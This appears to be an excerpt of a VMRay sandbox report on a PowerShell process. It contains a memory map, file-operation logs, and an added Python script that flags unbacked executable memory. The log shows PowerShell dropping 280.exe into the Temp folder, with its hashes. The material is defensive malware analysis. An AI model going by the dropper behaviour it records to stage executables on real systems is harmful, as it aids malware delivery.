private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000240000 0x00240000 0x00240fff Pagefile Backed Memory Readable True False False -
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00260000 0x0027efff Memory Mapped File Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory - True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory - True False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory - True False False -
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory - True False False -
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory - True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01cfefff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x01fdffff Private Memory - True False False -
private_0x0000000001fe0000 0x01fe0000 0x0201ffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0202ffff Private Memory Readable, Writable True False False -
l_intl.nls 0x02030000 0x02032fff Memory Mapped File Readable False False False -
private_0x0000000002040000 0x02040000 0x02040fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x02050000 0x02054fff Memory Mapped File Readable False False False -
microsoft.wsman.runtime.dll 0x02060000 0x02067fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000002070000 0x02070000 0x02070fff Pagefile Backed Memory Readable True False False -
private_0x0000000002080000 0x02080000 0x020bffff Private Memory Readable, Writable True False False -
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021c0000 0x021c0000 0x025b2fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000025c0000 0x025c0000 0x025c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000025d0000 0x025d0000 0x0260ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x00000000026a0000 0x026a0000 0x026dffff Private Memory Readable, Writable True False False -
sortkey.nlp 0x026e0000 0x02720fff Memory Mapped File Readable False False False -
private_0x0000000002740000 0x02740000 0x0277ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x02900000 0x02942fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000002990000 0x02990000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable, Executable True False False -
private_0x00000000029f0000 0x029f0000 0x049effff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x049f0000 0x04aaffff Memory Mapped File Readable, Writable False False False -
private_0x0000000004ae0000 0x04ae0000 0x04b1ffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04b20000 0x04e01fff Memory Mapped File Readable, Writable, Executable False False False -
powershell.exe 0x21c10000 0x21c81fff Memory Mapped File Readable, Writable, Executable False False False -
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.management.ni.dll 0x6d7f0000 0x6d8b2fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.utility.ni.dll 0x6d8c0000 0x6da5dfff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x6da60000 0x6dafbfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.wsman.management.ni.dll 0x6db00000 0x6db84fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x6db90000 0x6ddc4fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x6ddd0000 0x6e649fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x6e650000 0x6e931fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x6e940000 0x6f0dbfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x6f0e0000 0x6fbd7fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x6fbe0000 0x7018afff Memory Mapped File Readable, Writable, Executable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74330000 0x7437bfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74650000 0x746c9fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x746d0000 0x74719fff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x75170000 0x75194fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x751a0000 0x751eafff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x751f0000 0x75270fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x752b0000 0x752c3fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75330000 0x75339fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75350000 0x75368fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x75370000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x753e0000 0x753e8fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in flog.txt.
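The map above is worth one automated pass before reading it by hand: executable memory that is not backed by an image on disk (the `Private Memory` rows carrying `Executable`) is where in-memory loaders and unpacked payloads live. The parser below is an added example, not part of the VMRay report; it assumes the row layout exactly as rendered on this page (name, start, end, region type, permission list or `-`, three unlabelled True/False columns whose headers fall outside this excerpt, trailing `-`) and is fed a constructed sample of rows copied from this map. For a .NET host such as powershell.exe the CLR JIT legitimately allocates such regions, so the output is a triage list of regions to dump and inspect, not a verdict.

```python
"""Flag unbacked executable memory in a VMRay process memory map.

Added example, not part of the VMRay report.  The sample rows are copied
from the powershell.exe memory map on this page; the three unlabelled
True/False columns are parsed but not interpreted.
"""
import re

# Constructed sample: a handful of rows from the report's memory map.
SAMPLE_MAP = """\
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory - True False False -
microsoft.wsman.runtime.dll 0x02060000 0x02067fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable, Executable True False False -
powershell.exe 0x21c10000 0x21c81fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
"""

ROW = re.compile(
    r"^(?P<name>\S+)\s+(?P<start>0x[0-9a-f]+)\s+(?P<end>0x[0-9a-f]+)\s+"
    r"(?P<kind>Private Memory|Pagefile Backed Memory|Memory Mapped File)\s+"
    r"(?P<perms>(?:Readable|Writable|Executable)(?:,\s*(?:Readable|Writable|Executable))*|-)\s+"
    r"(?P<flags>(?:True|False)(?:\s+(?:True|False)){2})\s+-\s*$"
)


def parse_region(line):
    """Parse one memory-map row into a dict; non-row lines give None."""
    m = ROW.match(line.strip())
    if not m:
        return None
    start = int(m["start"], 16)
    end = int(m["end"], 16)
    perms = set() if m["perms"] == "-" else {p.strip() for p in m["perms"].split(",")}
    return {
        "name": m["name"],
        "start": start,
        "end": end,
        "size": end - start + 1,
        "kind": m["kind"],
        "perms": perms,
        # Three boolean columns whose headers are not part of this excerpt.
        "flags": [f == "True" for f in m["flags"].split()],
    }


def find_unbacked_executable(lines):
    """Return private (not file-backed) regions that are executable.

    Image-backed RWX rows (the DLLs) are deliberately skipped: they are
    loaded modules, not allocated code.  For a .NET host the CLR JIT also
    produces private executable regions, so treat hits as a dump list.
    """
    hits = []
    for line in lines:
        r = parse_region(line)
        if r and r["kind"] == "Private Memory" and "Executable" in r["perms"]:
            hits.append(r)
    return hits


if __name__ == "__main__":
    for r in find_unbacked_executable(SAMPLE_MAP.splitlines()):
        print(f"{r['start']:#010x}-{r['end']:#010x} {r['size']:>8} bytes  {r['name']}")
```

Run against the sample it reports four regions (0x001d0000, 0x029b0000, 0x777e0000, 0x77900000); the mapped DLLs and powershell.exe itself, although also RWX, are not listed because they are file-backed.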
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\280.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e, SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\users\kft6utqw\appdata\local\temp\280.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f, SHA1: d112719238664d7996048614d75db8a67fc50fc5, SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473 False
Host Behavior
File (343)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.config type = file_attributes False 3
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\kFT6uTQW type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\kFT6uTQW\Desktop type = file_attributes True 9
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_type True 2
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_type True 2
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_attributes True 3
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
